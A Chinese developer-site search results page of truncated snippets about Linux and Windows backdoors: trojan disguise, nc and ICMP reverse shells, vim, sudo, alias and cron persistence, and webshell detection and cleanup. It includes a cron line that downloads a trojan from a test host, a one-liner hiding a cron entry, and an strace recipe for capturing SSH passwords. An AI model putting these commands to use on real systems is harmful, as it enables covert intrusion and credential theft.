首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往

木马伪装-后门木马变形记

在做安全测试时,种个后门养个马在所难免,常见的后门有exe、bat、scr、vb等格式,可是凡是有点安全意识的都不会去下载、双击打开,那给后门穿件衣裳可好。...metasploit堪称渗透神器,经常用它来生成后门文件,来拿服务器权限。此处就以metasploit生成个exe后门为例,看她如何华丽转身。...2、利用Resource_Hacker给后门穿件马夹 打开Resource_Hacker,通过file—>open导入我们提前生成的后门test.exe ?...最后点击保存,这个时候我们的后门已经穿好马夹,如下 ?...最后:伪装的木马虽然骗的了我们的眼睛,但是骗不过杀毒软件,只有免杀的木马穿上这件马夹才能碰撞出更激情的火花,实现华丽转身。

2.6K20
您找到你想要的搜索结果了吗?
是的
没有找到

nc 反弹shell ​| Linux 后门系列

---- 关于nc之前文章就已经讲过了,不过我发现不同 linux 的nc不太一样 ?...Common uses include: · simple TCP proxies · shell-script based HTTP clients...原理其实就是管道技术 参考文章: https://www.cnblogs.com/old-path-white-cloud/p/11685558.html 本来我对自己的Linux知识还是挺有信心的,不过最近研究了这些...Linux 后门之后发现我竟然对这些命令有些犹豫(其实就是学艺不精啦) 我对这个 rm -f /tmp/f 就十分不理解,实验之后我发现,没错,就是删除 /tmp/f 这个文件,没啥特殊的,就是怕mkfifo...> /tmp/f ---- 本来我想如果加上 -k 选项是不是可以做一个持久后门,经过尝试, 加上 -k 只能保证端口开放,没有办法保持命令执行 如果你遇到的nc 有 -e 或者 -c 选项,可以尝试

2.9K30

网站后门木马怎么清理

收到阿里云的短信提醒说是网站存在后门,webshell恶意通信行为,紧急的安全情况,我第一时间登录阿里云查看详情,点开云盾动态感知,查看了网站木马的详细路径以及webshell的特征,网站从来没有出现过这种情况...首先我们要知道什么是网站后门?...(也叫webshell) 网站后门,是植入到网站目录下以及服务器路径里的一个网站木马,主要利用网站代码的脚本语言来进行后门的运行,像asp,aspx,php,jsp语言的脚本文件格式,都是可以在网站里以后门的运行...网站后门使用的都是网站的80端口来进行访问,利用脚本语言的便利性来进行编写后门代码,一个完整的后门通常都带有主动连接的一个代码,可以对网站进行上传,下载,修改,新建目录,执行系统命令,更改文件名称等管理员的操作...阿里云的后台也会显示出网站木马的路径,可以根据阿里云后台的显示进行删除与隔离,但是网站后门是如何被上传的,这个要搞清楚原因,一般是网站存在漏洞,以及服务器安全没有做好导致的被上传的,如果网站漏洞没有修复好

2.5K20

Vim 后门 | Linux 后门系列

环境变量的方式进行配置 果然,$VIMRUNTIME 是从 Linux 操作系统的环境变量来的 因此永久修改 VIMRUNTIME 不一定会修改 runtimepath ,只有通过Linux...制作后门文件 1) 下载源代码 在相同版本的 Linux 主机 B 上下载相同版本 vim 源代码 在主机B上编辑更新源,取消 deb-src 的注释 在主机 B 上下载 vim 源代码(可以指定版本...成功创建了有效的带有后门,且功能正常的 vim 3) 用后门vim替换 /usr/bin/vim 4) 模拟正常使用vim触发后门 成功触发后门 5) 小结 几乎每一种后门都可以用这样的方法...参数 下面以通过 +libcall 调用 libc 中的 system 函数,执行反弹shell 脚本为例 let result = libcall("/usr/lib/x86_64-linux-gnu...函数,执行的是系统命令,那可以通过加一个 & 符号让命令在后台执行 对于反弹shell来说,如果接收反弹shell处未开启监听,会产生报错 2.

57651

sudo 后门Linux 后门系列

sudo 经常被用来将普通用户权限提升至 root 权限,代替 root 执行部分程序来管理 Linux 系统,这样避免 root 密码被泄漏 这篇文章介绍了三种利用其留后门的方法,其中也涉及一个sudo...有趣的特性,在极端条件下可能是系统的薄弱点;同时涉及一个没什么人关注的小知识点 sudo 配置后门 sudoedit 文件所有者后门 sudo plugin 后门 这篇文章以 Ubuntu Server...sudo vim /etc/sudoers.d/README 这样就可以通过控制一个普通账号随时获取 root 权限 4) 小延伸 如果你是一个受限,非交互的 shell ,可以通过标准输入的方式执行...这个后门更偏向于一个概念性的后门,以趣味性为主吧 前段时间复现 CVE-2023-22809 的时候关注到 sudoedit (sudo -e) 这个程序,这个程序用来让可以sudo的用户通过 sudoedit...正常使用 sudo ,查看效果 sudo cat /etc/shadow 成功获取到 shell

32310

alias后门 | Linux 后门系列

/etc/profile 、 /etc/bashrc 、~/.bashrc、~/.bash_profile 、~/.profile 、~/.bash_logout /etc/profile 【系统级】Linux...用户登录或切换(即Login shell 启动)时都有一个专用的运行环境,但首先执行 /etc/profile /etc/bashrc 【系统级】在 bash shell 打开时运行,修改该文件配置的环境变量将会影响所有用户使用的...bash shell ~/.bashrc 【用户级】当用户登录时以及每次打开新的shell时该文件都将被读取,不推荐在这里配置用户专用的环境变量,因为每开一个shell,该文件都会被读取一次,效率肯定受影响...把strace的输出单独写到指定的文件 /tmp/sshpwd-xxx.log ,这个没啥好说的 -e read,write,connect Linux内核目前有300多个系统调用,详细的列表可以通过...后门 ?

7.5K30

教你学木马攻防 | 隧道木马 | ICMP反弹shell

前言 前文回顾: 教你学木马攻防 | 隧道木马 | 第一课 在上一篇文章中,我们讲解了木马中常用的端口转发技术,这一节讲解一下木马通信协议中的ICMP协议,并通过ICMP实现一个反弹shell。...最直观的做法是使用抓包工具看一下icmp包的内容,分别看一下windows和linux平台的ping发包,会有一些不同。 在win10上,ping www.baidu.com: ?...而linux则不一样。...第三节 ICMP反弹shell 如果之前做过渗透测试的朋友,肯定知道反弹shell,ICMP反弹shell只不过是将通信协议换成了ICMP。其基本架构内容如下: ?...第四节 最后 推荐阅读: Python RASP 工程化:一次入侵的思考 教你学木马攻防 | 隧道木马 | 第一课 一个Python开源项目-哈勃沙箱源码剖析(下)

3.9K30

网站漏洞测试 关于webshell木马后门检测

垂直水平越权漏洞,文件上传漏洞.等等服务项目,在进行安全测试之前,我们对客户的网站大体的了解了一下,整个平台网站,包括APP,安卓端,IOS端都采用的JSP+oracle数据库架构开发,前端使用VUE,服务器是linux....jsp,并提交过去,返回数据为成功上传.复制路径,浏览器里打开,发现我们上传的JSP脚本文件执行了,也再一次的证明该漏洞是足以导致网站数据被篡改的,在这之前客户的网站肯定被上传了webshell网站木马文件...,随即我们对客户的网站源代码进行全面的人工安全检测与分析,对一句话木马特制eval,加密,包括文件上传的时间点,进行检查,发现在网站的JS目录下存在indax.jsp,浏览器里打开访问,是一个JSP的脚本木马

3.2K40

用搜索神器Everything定位Webshell木马后门

编程高手也可以自行编写脚本调用Everything的命令行来进行周期性的扫描、报告,如果写好了能给大家分享一下那就更好了(☆_☆)/~~ ————————– 在Linux上因为原生集成了很多命令行工具,...速度也是非常快,所以也不用其他多余的工具了,写个shell脚本,然后放在crontab中周期性运行并把结果发送给自己,效果还是很不错的。...要想查的准确需要熟悉webshell常用的关键字,我这里列出一些常用的,其他的大家可以从网收集一些webshell,总结自己的关键字,括号里面我总结的一些关键字(eval,shell_exec,passthru.../to/webroot -name "*.php" |xargs grep "eval" |less find /path/to/webroot -name "*.php" |xargs grep "shell_exec...因为Linux上的这个的查找方法在各种网站上都有类似的内容,没法找到原文出处,如有请告知,谢谢。

2K80

服务器后门木马如何查找分析情报

那这个时候你坐地铁或者坐高铁是不是就不行了,IP和域名的信誉度也是一样的,你一旦被标记为攻击IP或者木马反连,这时候对于我们来说,你这个IP就没有信誉度了,我发现你这个地址,我的服务在访问你,就怀疑它是攻击...看有没有此IP发送的请求,或者从内部向他发送的请求,搜索一下这个IP地址是什么,那就不能用云砂箱,还在微博在线刚才的搜索栏,这里边是它的一些信誉度,也就和咱们的信用卡一样,你消费过度了,看他执行了CS的木马...那看一下,这是给大家特别特别推荐去查木马的一个沙箱,看我把刚才的恶意软件上传到上去,看这里边有相当多的杀毒软件,60%或者70以上都报它为恶意木马或者病毒后门,这时候你就肯定就要把 IP封禁了,就是说通过刚才微博在线就直接封禁了...因为可能在这儿你查出来那个文件,他也访问了这个IP,但你查过一些情报,这个IP是完全没有被消费过的,也就是说它他这块没有任何发现情报,那你就是第一个发现情报的人,你发现它就是木马,那它又反向这个 IP,...关于威胁情报的就讲到这里如果遇到服务器中了后门木马无法查杀和排除的话可以向服务器安全服务商SINE安全寻求技术排查。

1K20

计划任务后门 | Linux 后门系列

Linux 计划任务是一项服务,由 cron 工具来完成,主要目的就是在无需人工干预的情况下运行作业 PS: 功能较为简单的at命令在Ubuntu 16.04中已经不自带了 0x01 cron服务简介...一会儿再说吧(Linux上万物皆文件,肯定是文件啦!)...以满足多用户权限管控的要求 0x04 简单练习 每天凌晨3点半清理一下/home/xxxx/test文件夹 30 3 * * * rm -r /home/xxxx/test/* 每隔10分钟下载一下我们的木马...*/10 * * * * wget http://www.test.com/muma.exe 0x05 后门利用 首先介绍一下日志的问题,Ubuntu 16.04 默认情况下是不会将日志记录到 /var...0x06 巧用计划任务留后门 (crontab -l;printf "*/1 * * * * /home/helper/1.sh;\rno crontab for `whoami`%100c\n")|crontab

6.5K50
领券